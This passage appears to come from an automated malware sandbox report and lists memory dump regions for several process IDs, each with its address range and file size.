
                                                                    140KB

                                                                  • memory/3368-111-0x00007FFAEB5C0000-0x00007FFAEB737000-memory.dmp

                                                                    Filesize

                                                                    1.5MB

                                                                  • memory/3368-115-0x00007FFAFE030000-0x00007FFAFE049000-memory.dmp

                                                                    Filesize

                                                                    100KB

                                                                  • memory/3368-116-0x00007FFB040F0000-0x00007FFB040FD000-memory.dmp

                                                                    Filesize

                                                                    52KB

                                                                  • memory/3368-124-0x00007FFAFDE40000-0x00007FFAFDE54000-memory.dmp

                                                                    Filesize

                                                                    80KB

                                                                  • memory/3368-127-0x00007FFB02D40000-0x00007FFB02D4D000-memory.dmp

                                                                    Filesize

                                                                    52KB

                                                                  • memory/3368-401-0x00007FFB040F0000-0x00007FFB040FD000-memory.dmp

                                                                    Filesize

                                                                    52KB

                                                                  • memory/3368-403-0x00007FFAEB0A0000-0x00007FFAEB5C0000-memory.dmp

                                                                    Filesize

                                                                    5.1MB

                                                                  • memory/3368-129-0x00007FFAEB740000-0x00007FFAEBD29000-memory.dmp

                                                                    Filesize

                                                                    5.9MB

                                                                  • memory/3368-130-0x00007FFAEAEB0000-0x00007FFAEAFCC000-memory.dmp

                                                                    Filesize

                                                                    1.1MB

                                                                  • memory/3368-285-0x00007FFAEB5C0000-0x00007FFAEB737000-memory.dmp

                                                                    Filesize

                                                                    1.5MB

                                                                  • memory/3368-405-0x00007FFAFDE40000-0x00007FFAFDE54000-memory.dmp

                                                                    Filesize

                                                                    80KB

                                                                  • memory/3368-406-0x00007FFB02D40000-0x00007FFB02D4D000-memory.dmp

                                                                    Filesize

                                                                    52KB

                                                                  • memory/3368-117-0x00007FFAFDFF0000-0x00007FFAFE023000-memory.dmp

                                                                    Filesize

                                                                    204KB

                                                                  • memory/3368-120-0x00007FFAEAFD0000-0x00007FFAEB09D000-memory.dmp

                                                                    Filesize

                                                                    820KB

                                                                  • memory/3368-407-0x00007FFAEAEB0000-0x00007FFAEAFCC000-memory.dmp

                                                                    Filesize

                                                                    1.1MB

                                                                  • memory/3368-329-0x00007FFAFE030000-0x00007FFAFE049000-memory.dmp

                                                                    Filesize

                                                                    100KB

                                                                  • memory/3368-354-0x00007FFAEAFD0000-0x00007FFAEB09D000-memory.dmp

                                                                    Filesize

                                                                    820KB

                                                                  • memory/3368-353-0x00007FFAFDFF0000-0x00007FFAFE023000-memory.dmp

                                                                    Filesize

                                                                    204KB

                                                                  • memory/3368-375-0x00007FFAEB0A0000-0x00007FFAEB5C0000-memory.dmp

                                                                    Filesize

                                                                    5.1MB

                                                                  • memory/3368-382-0x00007FFAEB5C0000-0x00007FFAEB737000-memory.dmp

                                                                    Filesize

                                                                    1.5MB

                                                                  • memory/3368-377-0x00007FFB02E50000-0x00007FFB02E73000-memory.dmp

                                                                    Filesize

                                                                    140KB

                                                                  • memory/3368-376-0x00007FFAEB740000-0x00007FFAEBD29000-memory.dmp

                                                                    Filesize

                                                                    5.9MB

                                                                  • memory/3368-408-0x00007FFAEB5C0000-0x00007FFAEB737000-memory.dmp

                                                                    Filesize

                                                                    1.5MB

                                                                  • memory/3368-393-0x00007FFAEB740000-0x00007FFAEBD29000-memory.dmp

                                                                    Filesize

                                                                    5.9MB

                                                                  • memory/3368-404-0x00007FFAEAFD0000-0x00007FFAEB09D000-memory.dmp

                                                                    Filesize

                                                                    820KB

                                                                  • memory/3368-414-0x00007FFAFE050000-0x00007FFAFE073000-memory.dmp

                                                                    Filesize

                                                                    140KB

                                                                  • memory/3368-409-0x00007FFAFDFF0000-0x00007FFAFE023000-memory.dmp

                                                                    Filesize

                                                                    204KB

                                                                  • memory/3368-412-0x00007FFB02CF0000-0x00007FFB02D1D000-memory.dmp

                                                                    Filesize

                                                                    180KB

                                                                  • memory/3368-411-0x00007FFB07840000-0x00007FFB0784F000-memory.dmp

                                                                    Filesize

                                                                    60KB

                                                                  • memory/3368-410-0x00007FFB02E50000-0x00007FFB02E73000-memory.dmp

                                                                    Filesize

                                                                    140KB

                                                                  • memory/3836-1-0x0000000000AB0000-0x00000000012E0000-memory.dmp

                                                                    Filesize

                                                                    8.2MB

                                                                  • memory/3836-0-0x00007FFAEEA33000-0x00007FFAEEA35000-memory.dmp

                                                                    Filesize

                                                                    8KB

                                                                  • memory/4992-270-0x00000135ADB60000-0x00000135ADB68000-memory.dmp

                                                                    Filesize

                                                                    32KB

                                                                  • memory/5104-302-0x00000000067C0000-0x00000000067CA000-memory.dmp

                                                                    Filesize

                                                                    40KB

                                                                  • memory/5112-201-0x0000000002DC0000-0x0000000002DD0000-memory.dmp

                                                                    Filesize

                                                                    64KB

                                                                  • memory/5112-391-0x0000000002DC0000-0x0000000002DD0000-memory.dmp

                                                                    Filesize

                                                                    64KB

                                                                  • memory/5112-22-0x0000000000BD0000-0x0000000000C08000-memory.dmp

                                                                    Filesize

                                                                    224KB

                                                                  • memory/5112-31-0x00007FFAEEA30000-0x00007FFAEF4F1000-memory.dmp

                                                                    Filesize

                                                                    10.8MB